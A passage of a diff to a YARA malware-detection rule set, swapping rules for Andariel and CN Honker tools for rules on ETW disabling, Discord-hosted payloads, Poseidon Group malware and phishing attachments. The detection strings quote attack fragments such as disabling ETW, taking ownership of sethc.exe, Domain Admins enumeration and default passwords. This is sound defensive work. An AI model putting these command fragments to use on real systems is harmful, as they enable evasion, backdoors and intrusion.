+		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$str_nopineapple = "< No Pineapple! >"
-		$str_qt_library = "Qt 5.12.10"
-		$str_xor = {8B 10 83 F6 ?? 83 FA 01 77}
+		$ = "Debug\\Shellcode" ascii
+		$ = "Release\\Shellcode" ascii
+		$ = "Debug\\ShellCode" ascii
+		$ = "Release\\ShellCode" ascii
+		$ = "Debug\\shellcode" ascii
+		$ = "Release\\shellcode" ascii
+		$ = "shellcode.pdb" nocase ascii
+		$ = "\\ShellcodeLauncher" ascii
+		$ = "\\ShellCodeLauncher" ascii
+		$ = "Fucker.pdb" ascii
+		$ = "\\AVFucker\\" ascii
+		$ = "ratTest.pdb" ascii
+		$ = "Debug\\CVE_" ascii
+		$ = "Release\\CVE_" ascii
+		$ = "Debug\\cve_" ascii
+		$ = "Release\\cve_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Dtrack_Unpacked : FILE
+rule SIGNATURE_BASE_SUSP_Disable_ETW_Jun20_1
 {
 	meta:
-		description = "Detects DTrack variant used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "0c161275-2b2e-51a4-9e08-c118fb4c8671"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L369-L392"
+		description = "Detects method to disable ETW in ENV vars before executing a program"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ea5dee09-959e-5ef2-8f84-5497bdef0a05"
+		date = "2020-06-06"
+		modified = "2025-03-21"
+		reference = "https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L395-L413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8de583fc0de01e6784305d28dbf7cea859a24cf4df1dc59356601bc830e4770"
-		score = 75
+		logic_hash = "182ad2512bcfbcd92d13380113b32982eb367e458019f07038a12f494dfbebb6"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$x_str_cmd_4 = "/c systeminfo > \"%s\" & tasklist > \"%s\" & netstat -naop tcp > \"%s\"" wide
-		$x_str_cmd_2 = "/c ping -n 3 127.0.01 > NUL % echo EEE > \"%s\"" wide
-		$str_mutex = "MTX_Global"
-		$str_cmd_1 = "/c net use \\\\" wide
-		$str_cmd_3 = "/c move /y %s \\\\" wide
+		$x1 = "set COMPlus_ETWEnabled=0" ascii wide fullword
+		$x2 = "$env:COMPlus_ETWEnabled=0" ascii wide fullword
+		$s1 = "Software\\Microsoft.NETFramework" ascii wide
+		$sa1 = "/v ETWEnabled" ascii wide fullword
+		$sa2 = " /d 0" ascii wide
+		$sb4 = "-Name ETWEnabled"
+		$sb5 = " -Value 0 "
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 3 of them )
+		1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Tigerrat_Crowdsourced_Rule : FILE
+rule SIGNATURE_BASE_SUSP_PE_Discord_Attachment_Oct21_1 : FILE
 {
 	meta:
-		description = "Detects the Tiger RAT variant used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "6be65222-7d3c-5ff5-a9c7-d91dcf1deaa6"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L394-L423"
+		description = "Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7c217350-4a35-505d-950d-1bc989c14bc2"
+		date = "2021-10-12"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L415-L429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d203d8c7e624796571f4597f70be0b8303f21c096640f25018cad29d4abc05b"
-		score = 75
+		logic_hash = "4d84ec50738f4c7aca8e77c3aabdcd77f3071733a2245a58283f070f2b220599"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$m1 = ".?AVModuleKeyLogger@@" fullword ascii
-		$m2 = ".?AVModulePortForwarder@@" fullword ascii
-		$m3 = ".?AVModuleScreenCapture@@" fullword ascii
-		$m4 = ".?AVModuleShell@@" fullword ascii
-		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
-		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
-		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
-		$s4 = "del \"%s\"%s \"%s\" goto " ascii
+		$x1 = "https://cdn.discordapp.com/attachments/" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_WIN_Tiger_RAT_Auto : FILE
+rule SIGNATURE_BASE_SUSP_Encoded_Discord_Attachment_Oct21_1 : FILE
 {
 	meta:
-		description = "Detects the Tiger RAT variant used by Andariel"
-		author = "CISA.gov"
-		id = "4579af62-52be-5f5f-a577-16ec50297c05"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L425-L565"
+		description = "Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06c086f4-8b79-5506-9e3f-b5d099106157"
+		date = "2021-10-12"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L431-L456"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1deef66efb44c0d17f33508a8b6f0d6253f0308f309e81657f78eb0f87121bf5"
-		score = 75
+		logic_hash = "1ea5a83e91b5c5b4b8a1d507c365bc1583394c97a28b7d7a576f085854676769"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }
-		$sequence_1 = { 41b901000000 488bd6 488bcb e8???????? }
-		$sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }
-		$sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }
-		$sequence_4 = { 488b01 ff10 488b4e18 488b01 }
-		$sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }
-		$sequence_6 = { 488b01 eb03 488bc1 0fb600 }
-		$sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }
-		$sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }
-		$sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }
-		$sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }
-		$sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff }
-		$sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? }
-		$sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }
-		$sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? }
-		$sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }
+		$enc_b01 = "Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz" ascii wide
+		$enc_b02 = "Nkbi5kaXNjb3JkYXBwLmNvbS9hdHRhY2htZW50c" ascii wide
+		$enc_b03 = "jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudH" ascii wide
+		$enc_b04 = "AGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABz" ascii wide
+		$enc_b05 = "BjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAc" ascii wide
+		$enc_b06 = "AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AH" ascii wide
+		$enc_h01 = "63646E2E646973636F72646170702E636F6D2F6174746163686D656E7473" ascii wide
+		$enc_h02 = "63646e2e646973636f72646170702e636f6d2f6174746163686d656e7473" ascii wide
+		$enc_r01 = "stnemhcatta/moc.ppadrocsid.ndc" ascii wide
 
 	condition:
-		filesize < 600KB and 7 of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_WIN_Dtrack_Auto : FILE
+rule SIGNATURE_BASE_Poseidongroup_Malware : FILE
 {
 	meta:
-		description = "Detects DTrack variant used by Andariel"
-		author = "CISA.gov"
-		id = "1b40c685-beba-50fa-b484-c1526577cb23"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L567-L707"
+		description = "Detects Poseidon Group Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fe8b227a-d93d-5540-ba73-3f20358205f6"
+		date = "2016-02-09"
+		modified = "2023-01-27"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poseidon_group.yar#L8-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2bd68ee6e5f35a9b80c07120beba3fe1f3ba9a9137ee15bb04bb2740381a9a44"
-		score = 75
+		logic_hash = "315d540f2d2cb7b55e1a069cef8dd2eeceabcea4a428b33cf520a0f23d3819ea"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4"
+		hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3"
+		hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61"
+		hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47"
+		hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f"
+		hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb"
+		hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3"
 
 	strings:
-		$sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
-		$sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 }
-		$sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }
-		$sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }
-		$sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? }
-		$sequence_5 = { 51 e8???????? 83c410 8b558c 52 }
-		$sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }
-		$sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }
-		$sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }
-		$sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }
-		$sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }
-		$sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }
-		$sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }
-		$sequence_13 = { 0bc1 894518 8b5514 8955f8 }
-		$sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }
+		$s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii
+		$s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii
+		$s3 = "c:\\windows\\command.com" fullword ascii
+		$s4 = "copy \"%s\" \"%s\" /Y" fullword ascii
+		$s5 = "http://%s/files/" ascii
+		$s6 = "\"%s\". %s: \"%s\"." fullword ascii
+		$s7 = "0x0666" fullword ascii
+		$s8 = "----------------This_is_a_boundary$" fullword ascii
+		$s9 = "Server 2012" fullword ascii
+		$s10 = "Server 2008" fullword ascii
+		$s11 = "Server 2003" fullword ascii
+		$a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii
+		$a2 = "net.exe group \"Admins. do Dom" fullword ascii
+		$a3 = "(SVRID=%d)" fullword ascii
+		$a4 = "(TG=%d)" fullword ascii
+		$a5 = "(SVR=%s)" fullword ascii
+		$a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$a7 = "net.exe localgroup Administradores" fullword ascii
 
 	condition:
-		filesize < 1700KB and 7 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 650KB and 6 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $a* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Mafix_Root : FILE
+rule SIGNATURE_BASE_Poseidongroup_Maldoc_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file root"
+		description = "Detects Poseidon Group - Malicious Word Document"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae08b2e9-4d81-5f15-88d2-e2ace20626bf"
-		date = "2015-06-23"
+		id = "ab26455a-d468-5a75-a6e2-61701ca3a1df"
+		date = "2016-02-09"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L8-L24"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poseidon_group.yar#L50-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "826778ef9c22177d41698b467586604e001fed19"
-		logic_hash = "db54561ba4b9c1bd4d9b183658b98f6fd3165b05c8d6d7f006ae3b5fc96ba549"
-		score = 70
+		hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b"
+		logic_hash = "0d8c255f56bb33b6a720c98727127c07a2d77245b18da381706a40339bebd20b"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"# vbox (voice box) getty\" >> /tmp/.init1" fullword ascii
-		$s1 = "cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog" fullword ascii
-		$s2 = "if [ -f /sbin/xlogin ]; then" fullword ascii
+		$s1 = "c:\\cmd32dll.exe" fullword ascii
 
 	condition:
-		filesize < 96KB and all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Passwd_Dict_3389 : FILE
+rule SIGNATURE_BASE_Poseidongroup_Maldoc_2 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.txt"
+		description = "Detects Poseidon Group - Malicious Word Document"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9418f0e5-7bf0-5df3-8857-dea90fae5a54"
-		date = "2015-06-23"
+		id = "9fc0f25e-809d-5803-be39-740ce3a3c85a"
+		date = "2016-02-09"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L26-L46"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poseidon_group.yar#L66-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2897e909e48a9f56ce762244c3a3e9319e12362f"
-		logic_hash = "2be79fc7388ca12f06577e689944bcfa72ed1e1b6da5a7fa15c8da69a4555a9a"
+		logic_hash = "2c35077a4980336a2c50cade322861dc02f92f7617115420eebe7c882c2f620b"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c"
+		hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af"
+		hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a"
+		hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed"
+		hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778"
+		hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216"
 
 	strings:
-		$s0 = "654321" fullword ascii
-		$s1 = "admin123" fullword ascii
-		$s2 = "admin123456" fullword ascii
-		$s3 = "administrator" fullword ascii
-		$s4 = "passwd" fullword ascii
-		$s5 = "password" fullword ascii
-		$s7 = "12345678" fullword ascii
+		$s0 = "{\\*\\generator Msftedit 5.41." ascii
+		$s1 = "Attachment 1: Complete Professional Background" ascii
+		$s2 = "E-mail:  \\cf1\\ul\\f1"
+		$s3 = "Education:\\par" ascii
+		$s5 = "@gmail.com" ascii
 
 	condition:
-		filesize < 1KB and all of them
+		uint32( 0 ) == 0x74725c7b and filesize < 500KB and 3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Perl_Serv_U : FILE
+rule SIGNATURE_BASE_APT_MAL_CISA_10365227_03_Clientuploader_Dec21 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d793227d-dd4d-5c92-bfdc-9662c3ed8933"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L48-L63"
+		description = "Detects ClientUploader onedrv"
+		author = "CISA Code & Media Analysis"
+		id = "4eeadb28-9312-5602-932a-36acb48772f4"
+		date = "2021-12-23"
+		modified = "2021-12-24"
+		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stealer_cisa_ar22_277a.yar#L4-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f333c597ff746ebd5a641fbc248497d61e3ec17b"
-		logic_hash = "deb4ee54f9127bc093f96f7dbf3633fbfc3f66358c76fb15928dabbbffdd4963"
-		score = 70
+		logic_hash = "76f552b2416ae2426b73a321485f34a611c2a3c1ca35791bc9f1834072dc28be"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "84164e1e8074c2565d3cd178babd93694ce54811641a77ffdc8d1084dd468afb"
 
 	strings:
-		$s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii
-		$s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii
+		$s1 = "Decoder2"
+		$s2 = "ClientUploader"
+		$s3 = "AppDomain"
+		$s4 = { 5F 49 73 52 65 70 47 ?? 44 65 63 6F 64 65 72 73 }
+		$s5 = "LzmaDecoder"
+		$s6 = "$ee1b3f3b-b13c-432e-a461-e52d273896a7"
 
 	condition:
-		filesize < 8KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck : FILE
+rule SIGNATURE_BASE_APT_MAL_CISA_10365227_01_APPSTORAGE_Dec21 : APPSTORAGE FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L65-L81"
+		description = "Detects AppStorage ntstatus msexch samples"
+		author = "CISA Code & Media Analysis"
+		id = "a44c5609-980f-5961-921c-6b1824cdd49c"
+		date = "2021-12-23"
+		modified = "2021-12-24"
+		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stealer_cisa_ar22_277a.yar#L25-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
-		logic_hash = "be4817bcaae952eb13c35dd89606ec733c682b2e197054bb348c3934012bd105"
-		score = 70
+		logic_hash = "6a46bc4efa1f22d9fc65d946dbaa7b94de6074e65c228373bb6001f152d5b603"
+		score = 80
 		quality = 85
+		tags = "APPSTORAGE, FILE"
+		family = "APPSTORAGE"
+		hash1 = "157a0ffd18e05bfd90a4ec108e5458cbde01015e3407b3964732c9d4ceb71656"
+		hash2 = "30191b3badf3cdbc65d0ffeb68e0f26cef10a41037351b0f562ab52fce7432cc"
+
+	strings:
+		$s1 = "026B924DD52F8BE4A3FEE8575DC"
+		$s2 = "GetHDDId"
+		$s3 = "AppStorage"
+		$s4 = "AppDomain"
+		$s5 = "$1e3e5580-d264-4c30-89c9-8933c948582c"
+		$s6 = "hrjio2mfsdlf235d" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of them
+}
+rule SIGNATURE_BASE_APT_MAL_CISA_10365227_02_Clientuploader_Dec21 : FILE
+{
+	meta:
+		description = "Detects ClientUploader_mqsvn"
+		author = "CISA Code & Media Analysis"
+		id = "84351df9-e225-5c3f-9385-523246681a97"
+		date = "2021-12-23"
+		modified = "2021-12-24"
+		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stealer_cisa_ar22_277a.yar#L48-L67"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "f9f82b4577568d0bd60bac0d3132ed7ffcb338f508a8689f3126f3d2440432ef"
+		score = 80
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3585c3136686d7d48e53c21be61bb2908d131cf81b826acf578b67bb9d8e9350"
 
 	strings:
-		$s0 = "PassWord:F4ckTeam!@#" fullword ascii
-		$s1 = "UserName:F4ck" fullword ascii
-		$s2 = "F4ck Team" fullword ascii
+		$s1 = "UploadSmallFileWithStopWatch"
+		$s2 = "UploadPartWithStopwatch"
+		$s3 = "AppVClient"
+		$s4 = "ClientUploader"
+		$s5 = { 46 69 6C 65 43 6F 6E 74 61 69 6E 65 72 2E 46 69 6C 65 41 72 63 68 69 76 65 }
+		$s6 = { 4F 6E 65 44 72 69 76 65 43 6C 69 65 6E 74 2E 4F 6E 65 44 72 69 76 65 }
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389 : FILE
+rule SIGNATURE_BASE_SUSP_ZIP_LNK_Phishattachment_Pattern_Jun22_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.vbs"
+		description = "Detects suspicious tiny ZIP files with phishing attachment characteristics"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d385820-befe-5e2b-8c48-ad90564d5f42"
-		date = "2015-06-23"
+		id = "3537c4ea-a51d-5100-97d7-71a24da5ff43"
+		date = "2022-06-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L83-L97"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_phish_attachments.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f92b74f41a2138cc05c6b6993bcc86c706017e49"
-		logic_hash = "32603edd3f188a9f4919795df04112883d7b88da46b13fcd0b0e0065fd4c016b"
-		score = 70
+		logic_hash = "2ff398379e3d8112991eeacd99bf9d3bafbf3e9266f012d2539d6b2661d5969e"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4edb41f4645924d8a73e7ac3e3f39f4db73e38f356bc994ad7d03728cd799a48"
+		hash2 = "c4fec375b44efad2d45c49f30133efbf6921ce82dbb2d1a980f69ea6383b0ab4"
+		hash3 = "9c70eeac97374213355ea8fa019a0e99e0e57c8efc43daa3509f9f98fa71c8e4"
+		hash4 = "ddc20266e38a974a28af321ab82eedaaf51168fbcc63ac77883d8be5200dcaf9"
+		hash5 = "b59788ae984d9e70b4f7f5a035b10e6537063f15a010652edd170fc6a7e1ea2f"
 
 	strings:
-		$s1 = "success = obj.run(\"cmd /c takeown /f %SystemRoot%\\system32\\sethc.exe&echo y| " ascii
+		$sl1 = ".lnk"
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 2KB and $sl1 in ( filesize -256 .. filesize )
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_2 : FILE
+rule SIGNATURE_BASE_SUSP_ZIP_ISO_Phishattachment_Pattern_Jun22_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+		description = "Detects suspicious small base64 encoded ZIP files (MIME email attachments) with .iso files as content as often used in phishing attacks"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f449f632-3102-5e62-b790-5546698dd663"
-		date = "2015-06-23"
+		id = "638541a6-d2d4-513e-978c-9d1b9f5e3b71"
+		date = "2022-06-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L99-L114"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_phish_attachments.yar#L23-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5ff92f39ade12f8ba6cb75dfdc9bb907e49f0ebd"
-		logic_hash = "637b3368fac624ca78d2f573b8b937b6b265426d7ed923f3a3d06039663c97ad"
-		score = 70
+		logic_hash = "21de56d6209050b429c0cce82fd334d1b38a2a3727db5ead06f36fa9d503e193"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "@del c:\\termsrvhack.dll" fullword ascii
-		$s2 = "@del c:\\3389.txt" fullword ascii
+		$pkzip_base64_1 = { 0A 55 45 73 44 42 }
+		$pkzip_base64_2 = { 0A 55 45 73 44 42 }
+		$pkzip_base64_3 = { 0A 55 45 73 48 43 }
